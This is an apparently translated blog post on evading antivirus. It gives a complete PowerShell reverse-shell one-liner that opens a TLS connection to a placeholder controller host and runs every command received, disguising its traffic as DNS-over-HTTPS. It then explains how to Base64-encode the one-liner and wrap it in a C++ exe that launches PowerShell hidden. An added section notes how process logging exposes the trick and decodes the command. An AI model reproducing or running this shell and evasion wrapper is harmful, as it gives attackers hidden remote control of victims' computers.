C++ AV evasion, homegrown


Author: liusuxy    Difficulty: one star

Note: since the method is simple, someone may well have done this before.

The result (screenshot):

Evasion method:

  • 1. Generate the PowerShell reverse shell code

  • 2. Embed it in C++ and build an exe

1. Reverse shell code (PowerShell)

It is shown here as a single unbroken line; read it carefully. Replace CONTROLLER_IP and CONTROLLER_PORT with your listener's address and port.

"$TCPClient = New-Object Net.Sockets.TCPClient('CONTROLLER_IP', CONTROLLER_PORT);$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream); function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)};$StreamWriter.Close()"
A few things worth knowing about this one-liner before encoding it: the connection is wrapped in TLS, so the listener must be a TLS-wrapped listener (for example openssl s_server or ncat --ssl), not a plain nc; the validation callback `{$true}` accepts any server certificate, so a self-signed one on the listener is fine; and 'cloudflare-dns.com' is only the SNI name sent in the handshake, chosen so the traffic resembles DNS-over-HTTPS, not a host the shell actually connects to.

Then Base64-encode it and copy the result. PowerShell's -e / -EncodedCommand expects the script encoded as UTF-16LE before Base64, for example `[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($script))`; Base64 of the UTF-8 or ASCII bytes produces a string PowerShell cannot run, which is the most common reason the next step silently fails.

You can also use an online generator:

Online reverse shell generator

2. Embed it in C++ and build the exe

The author wrote a small template for this:

#include <cstdlib>   // system() lives here; windows.h is not needed for this

int main()
{
    // -nop: no profile, -w hidden: hidden window, -e: Base64 (UTF-16LE) encoded script
    system("powershell -nop -w hidden -e <the Base64 string copied above>");
    return 0;
}

Compile it and you are done.

Caveats a practitioner should keep in mind: system() on Windows runs the string through cmd.exe, so the process chain is your exe -> cmd.exe -> powershell.exe -e, and a console-subsystem build will still flash a console window. The Base64 is an encoding, not encryption; the full command line is recorded by process-creation logging (Windows Security event 4688 with command-line auditing enabled, Sysmon event 1), where the -e argument decodes back to the script in one step, and powershell.exe launched with -EncodedCommand from an unknown binary is a standard detection pattern. What this template avoids is static signatures on a PowerShell script file, nothing more.
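The two steps above as one worked example. This is added here and is not the author's code: it builds the exact string the template hands to system(), using the UTF-16LE-then-Base64 encoding that -e requires, checks it against the cmd.exe command-line limit, and decodes it back the way an analyst reading a process-creation log would. It only constructs the string and never launches PowerShell. The short Write-Output script is a constructed stand-in for the page's one-liner; the 8191-character limit check and the decoder are this example's additions.

```cpp
// Added example, not code from the original post. Builds the command line
// the template passes to system() and shows how little the encoding hides.
#include <cstdint>
#include <cstring>
#include <iostream>
#include <string>
#include <vector>

static const char kB64[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

// Standard Base64 with '=' padding.
std::string base64_encode(const std::vector<uint8_t>& in) {
    std::string out;
    size_t i = 0;
    for (; i + 2 < in.size(); i += 3) {
        uint32_t n = (in[i] << 16) | (in[i + 1] << 8) | in[i + 2];
        out += kB64[(n >> 18) & 63];
        out += kB64[(n >> 12) & 63];
        out += kB64[(n >> 6) & 63];
        out += kB64[n & 63];
    }
    size_t rem = in.size() - i;
    if (rem > 0) {                       // 1 or 2 trailing bytes
        uint32_t n = in[i] << 16;
        if (rem == 2) n |= in[i + 1] << 8;
        out += kB64[(n >> 18) & 63];
        out += kB64[(n >> 12) & 63];
        out += (rem == 2) ? kB64[(n >> 6) & 63] : '=';
        out += '=';
    }
    return out;
}

// -EncodedCommand wants the script as UTF-16LE bytes: for ASCII that is each
// character followed by 0x00. Non-ASCII input would need a real UTF-8 to
// UTF-16 conversion, which this example does not attempt.
std::vector<uint8_t> to_utf16le_ascii(const std::string& script) {
    std::vector<uint8_t> bytes;
    bytes.reserve(script.size() * 2);
    for (unsigned char c : script) {
        bytes.push_back(c);
        bytes.push_back(0x00);
    }
    return bytes;
}

// Value to put after "-e". Encoding the raw ASCII bytes instead yields a
// string PowerShell rejects, the usual reason step 2 appears to do nothing.
std::string encode_command(const std::string& script) {
    return base64_encode(to_utf16le_ascii(script));
}

// The string the template hands to system().
std::string build_cmdline(const std::string& script) {
    return "powershell -nop -w hidden -e " + encode_command(script);
}

// system() on Windows goes through cmd.exe, whose command line is capped at
// 8191 characters. The page's TLS one-liner is roughly 1,100 characters
// (about 2,900 after UTF-16LE + Base64) and fits; a much longer script
// would have to be delivered another way.
bool fits_cmd_exe_limit(const std::string& cmdline) {
    return cmdline.size() <= 8191;
}

// Inverse of encode_command: what an analyst does with the -e argument seen
// in a process-creation log. Base64 is an encoding, not encryption.
std::string decode_command(const std::string& b64) {
    std::vector<uint8_t> bytes;
    uint32_t acc = 0;
    int bits = 0;
    for (char c : b64) {
        if (c == '=') break;                          // padding: done
        const char* p = std::strchr(kB64, c);
        if (p == nullptr || c == '\0') continue;      // not in the alphabet
        acc = (acc << 6) | static_cast<uint32_t>(p - kB64);
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            bytes.push_back(static_cast<uint8_t>((acc >> bits) & 0xFF));
            acc &= (1u << bits) - 1;                  // keep unconsumed bits
        }
    }
    std::string script;
    for (size_t i = 0; i + 1 < bytes.size(); i += 2)
        script += static_cast<char>(bytes[i]);        // low byte of each UTF-16LE unit
    return script;
}

int main() {
    // Constructed stand-in for the page's reverse-shell one-liner; the real
    // script would be passed here unchanged.
    const std::string script = "Write-Output 'hello from -e'";
    const std::string cmd = build_cmdline(script);
    std::cout << cmd << '\n';
    std::cout << "fits cmd.exe limit: " << (fits_cmd_exe_limit(cmd) ? "yes" : "no") << '\n';
    std::cout << "decoded back: " << decode_command(encode_command(script)) << '\n';
    return 0;
}
```

Running it prints a command line of the same shape as the template's, which is also the line a defender sees in event 4688 or Sysmon event 1; feeding that -e argument to decode_command recovers the script verbatim, which is the whole point of the caveat above.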


Posted 2022-01-18 21:44 by liusuxy